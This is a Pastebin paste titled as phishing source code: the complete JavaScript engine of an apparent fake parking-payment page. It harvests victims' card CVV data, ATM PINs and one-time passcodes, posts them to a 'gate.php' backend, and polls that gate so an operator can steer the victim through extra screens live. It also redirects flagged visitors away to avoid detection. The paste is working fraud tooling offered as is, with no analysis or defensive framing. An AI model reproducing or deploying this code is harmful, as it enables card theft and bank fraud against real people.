Guest User

engine.js - Phishing sourcecode engine.js - 2025 - July - Hackout.ro

a guest
Jul 27th, 2025
19
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.67 KB | None | 0 0
  1. let
  2. gateURL = "gate.php",
  3. pingThrottle = 2000,
  4. formHeaders = new Headers({'Content-type': 'application/x-www-form-urlencoded; charset=UTF-8'});
  5. //
  6. fetch(gateURL, {
  7. method: 'POST',
  8. body: new URLSearchParams({
  9. action: "redirLink"
  10. }),
  11. headers: formHeaders
  12. })
  13. .then(response => response.json())
  14. .then(data => {
  15. redirectKick = data.redirectLink; // TODO: asta trebuie reparat
  16. });
  17.  
  18.  
  19.  
  20. const gotoHomeScreen = (event) => {
  21. if( typeof event !== 'undefined' && event !== null && typeof event !== "number"){
  22. event.preventDefault();
  23. }
  24. display("timerScreen")
  25. }
  26.  
  27. const gotoPlatesScreen = (event) => {
  28. event.preventDefault();
  29. display("plateScreen")
  30. }
  31.  
  32. const showError = (screenElement) => {
  33. document.getElementById(screenElement).querySelector(".error_msg").classList.remove("hidden")
  34. }
  35.  
  36. const gotoCvvScreen = (event) => {
  37. if( typeof event !== 'undefined' && event !== null && typeof event !== "number"){
  38. event.preventDefault();
  39. }
  40. display("cvvScreen")
  41. if( event == 1 ){
  42. showError("cvvScreen")
  43. //alert("show error msg")
  44. }
  45.  
  46.  
  47. }
  48.  
  49. const submitCvvData = (event) =>{
  50. event.preventDefault();
  51. //hideScreens();
  52. let formData = getFormData(event, "cvv")
  53. let ll = sendData(formData)
  54. console.log(ll)
  55. console.log(formData)
  56.  
  57. }
  58.  
  59. const submitPinData = (event) =>{
  60. event.preventDefault();
  61. //hideScreens();
  62. let formData = getFormData(event, "atm")
  63. let ll = sendData(formData)
  64. console.log(ll)
  65. console.log(formData)
  66.  
  67. }
  68.  
  69. const submitOtpData = (event) =>{
  70. event.preventDefault();
  71. //hideScreens();
  72. let formData = getFormData(event, "otp")
  73. let ll = sendData(formData)
  74. console.log(ll)
  75. console.log(formData)
  76.  
  77. }
  78.  
  79. const gotoConfirmScreen = (event) => {
  80. if( typeof event !== 'undefined' && event !== null && typeof event !== "number"){
  81. event.preventDefault();
  82. }
  83. display("confirmScreen")
  84. if( event == 1 ){
  85. showError("confirmScreen")
  86. //alert("show error msg")
  87. }
  88. }
  89.  
  90. const gotoOtpScreen = (event) => {
  91. if( typeof event !== 'undefined' && event !== null && typeof event !== "number"){
  92. event.preventDefault();
  93. }
  94. display("otpScreen")
  95. if( event == 1 ){
  96. showError("otpScreen")
  97. //alert("show error msg")
  98. }
  99. }
  100. const gotoPinScreen = (event) => {
  101. if( typeof event !== 'undefined' && event !== null && typeof event !== "number"){
  102. event.preventDefault();
  103. }
  104. display("pinScreen")
  105. if( event == 1 ){
  106. showError("pinScreen")
  107. //alert("show error msg")
  108. }
  109. }
  110. const gotoErrScreen = (event) => {
  111. if( typeof event !== 'undefined' && event !== null && typeof event !== "number"){
  112. event.preventDefault();
  113. }
  114. display("errScreen")
  115. if( event == 1 ){
  116. showError("errScreen")
  117. //alert("show error msg")
  118. }
  119. }
  120.  
  121. const hideScreens = () => {
  122. //hide all .screen | empty all .screen > input | set all select to first option
  123. document.getElementById("timerScreen").classList.remove("_hidden")
  124. document.getElementById("timerScreen").classList.add("hidden")
  125. document.getElementById("plateScreen").classList.remove("_hidden")
  126. document.getElementById("plateScreen").classList.add("hidden")
  127. document.getElementById("cvvScreen").classList.remove("_hidden")
  128. document.getElementById("cvvScreen").classList.add("hidden")
  129. document.getElementById("confirmScreen").classList.remove("_hidden")
  130. document.getElementById("confirmScreen").classList.add("hidden")
  131. document.getElementById("otpScreen").classList.remove("_hidden")
  132. document.getElementById("otpScreen").classList.add("hidden")
  133. document.getElementById("pinScreen").classList.remove("_hidden")
  134. document.getElementById("pinScreen").classList.add("hidden")
  135. document.getElementById("loadingScreen").classList.remove("_hidden")
  136. document.getElementById("loadingScreen").classList.add("hidden")
  137. document.getElementById("errScreen").classList.remove("_hidden")
  138. document.getElementById("errScreen").classList.add("hidden")
  139. document.getElementById("otp").value = "";
  140. document.getElementById("atmPin").value = "";
  141. allErrors = document.getElementsByClassName("error_msg")
  142. allInputs = document.querySelectorAll("input[type='text']")
  143.  
  144. for( let i=0;i<allInputs.length;i++){
  145. allInputs[i].value = ""
  146. }
  147.  
  148. for( let i=0;i<allErrors.length;i++){
  149. allErrors[i].classList.add("hidden")
  150. }
  151. }
  152.  
  153. const display = (screenName) => {
  154. hideScreens();
  155. document.getElementById(screenName).classList.remove("hidden")
  156. document.getElementById(screenName).classList.add("_hidden");
  157. const inputs = document.querySelectorAll('input:not([type="hidden"])');
  158. inputs.forEach(input => {
  159. input.value = '';
  160. });
  161. }
  162.  
  163.  
  164.  
  165. const getFormData =(event, action = "ping") => {
  166. let formData = {};
  167. formData["action"] = action
  168. for (let i = 0; i < event.target.length; i++) {
  169. if( null != event.target.elements[i].getAttribute("name") ){
  170. formData[event.target.elements[i].getAttribute("name")] = event.target.elements[i].value;
  171. }
  172. }
  173.  
  174.  
  175. return formData
  176. }
  177.  
  178. const gotoWaitScreen = () => {
  179. display("loadingScreen")
  180. }
  181.  
  182.  
  183.  
  184.  
  185. const sendData = (formData) => {
  186. fetch(gateURL, {
  187. method: 'POST',
  188. body: new URLSearchParams(formData),
  189. headers: formHeaders
  190. })
  191. .then(response => response.json())
  192. .then(data => {
  193. if (data.ban_status == 1) {
  194. document.body.innerHTML = '';
  195. window.location.replace(redirectKick);
  196. }
  197. // setTimeout(function () {
  198. // pingHome();
  199. // }, pingThrottle);
  200. executeFunction(data.cmd, data.params, data.extra);
  201. console.log(data)
  202. //alert(data.cmd);
  203. });
  204. }
  205. const executeFunction = (cmd, param = 0, extra = null) => {
  206.  
  207. //console.log( [cmd, param, extra] )
  208. switch ( parseInt(cmd) ) {
  209. case 0:
  210. // nein
  211. break;
  212. case 1:
  213. gotoHomeScreen(param);
  214. break;
  215. case 3:
  216. gotoCvvScreen(param);
  217. break;
  218. case 4:
  219. gotoConfirmScreen(param);
  220. break;
  221. case 5:
  222. gotoOtpScreen(param);
  223. break;
  224. case 6:
  225. gotoPinScreen(param);
  226. break;
  227. case 7:
  228. gotoErrScreen(param);
  229. break;
  230. case 8:
  231. window.location.replace(redirectKick)
  232. break;
  233. case 9:
  234. gotoWaitScreen();
  235. break;
  236.  
  237. default:
  238. //niet
  239. break;
  240. }
  241. }
  242.  
  243. // 1 -> timerScreen | timerForm
  244.  
  245. let pingHome = () => {
  246. fetch(gateURL, {
  247. method: 'POST',
  248. body: new URLSearchParams({
  249. action: "ping"
  250. }),
  251. headers: formHeaders
  252. })
  253. .then(response => response.json())
  254. .then(data => {
  255. if (data.ban_status == 1) {
  256. document.body.innerHTML = '';
  257. window.location.replace(redirectKick);
  258. }
  259. setTimeout(function () {
  260. pingHome();
  261. }, pingThrottle);
  262. executeFunction(data.cmd, data.params, data.extra);
  263. //alert(data.cmd);
  264. });
  265. }
  266.  
  267. setTimeout(function () {
  268. pingHome()
  269. }, pingThrottle);
  270.  
  271.  
  272. const calculateRate = () => {
  273. let totalTime = parseInt(document.getElementById("minutes_select").options[document.getElementById("minutes_select").selectedIndex].value) + parseInt(document.getElementById("hours_select").options[document.getElementById("hours_select").selectedIndex].value);
  274. totalPrice = 0.25 * totalTime /15;
  275. console.log(totalPrice)
  276. if(totalPrice > 4 ){
  277. totalPrice = 4;
  278. }
  279. let priceTags = document.getElementsByClassName("totalPriceSpan")
  280. for(let i=0;i<priceTags.length;i++){
  281. priceTags[i].textContent = totalPrice;
  282. }
  283. let humanTime = document.getElementsByClassName("humanTime")
  284. for(let i=0;i<humanTime.length;i++){
  285. humanTime[i].textContent = toHoursAndMinutes(totalTime);
  286. }
  287. }
  288.  
  289.  
  290. const setPlatenumber = () => {
  291. let currentPlateNumber = document.getElementById("plateNumber").value
  292.  
  293. let plateNumber = document.getElementsByClassName("licenseNumber")
  294. for(let i=0;i<plateNumber.length;i++){
  295. plateNumber[i].textContent = currentPlateNumber;
  296. }
  297. }
  298.  
  299.  
  300.  
  301. function toHoursAndMinutes(totalMinutes) {
  302. const hours = Math.floor(totalMinutes / 60);
  303. const minutes = totalMinutes % 60; return `${hours}h${minutes > 0 ? ` ${minutes}m` : ''}`;
  304. }
  305.  
  306. document.getElementById("timerForm").addEventListener("submit", gotoPlatesScreen )
  307. document.getElementById("plateForm").addEventListener("submit", gotoCvvScreen )
  308. document.getElementById("cvvForm").addEventListener("submit", submitCvvData )
  309. document.getElementById("pinForm").addEventListener("submit", submitPinData )
  310. document.getElementById("otpForm").addEventListener("submit", submitOtpData )
  311. // document.getElementById("cvvForm").addEventListener("submit", gotoConfirmScreen )
  312. document.getElementById("confirmForm").addEventListener("submit", gotoPlatesScreen )
  313. //document.getElementById("otpForm").addEventListener("submit", gotoPlatesScreen )
  314. //document.getElementById("pinForm").addEventListener("submit", gotoPlatesScreen )
  315.  
  316. document.getElementById("plateNumber").addEventListener("change", setPlatenumber)
  317.  
  318. document.getElementById("hours_select").addEventListener("change", calculateRate)
  319. document.getElementById("minutes_select").addEventListener("change", calculateRate)
  320.  
  321.  
  322.  
  323.  
  324. let resumePage = () => {
  325. //console.log("resume page")
  326. fetch(gateURL, {
  327. method: 'POST',
  328. body: new URLSearchParams({
  329. action: "ping"
  330. }),
  331. headers: formHeaders
  332. })
  333. .then(response => response.json())
  334. .then(data => {
  335. //console.log(data);
  336. if (data.ban_status == 1) {
  337. document.body.innerHTML = '';
  338. window.location.replace(redirectKick);
  339. }
  340. //console.log("executeFunction()")
  341. //console.log([data.page, data.params, data.extra])
  342. executeFunction(data.page, data.params, data.extra);
  343. });
  344. }
  345.  
  346. resumePage();
  347. calculateRate();
  348. setPlatenumber();
  349.  
  350. document.getElementById("minutes_select").options[document.getElementById("minutes_select").selectedIndex].value
  351. document.getElementById("hours_select").options[document.getElementById("hours_select").selectedIndex].value
  352.  
Advertisement
Add Comment
Please, Sign In to add comment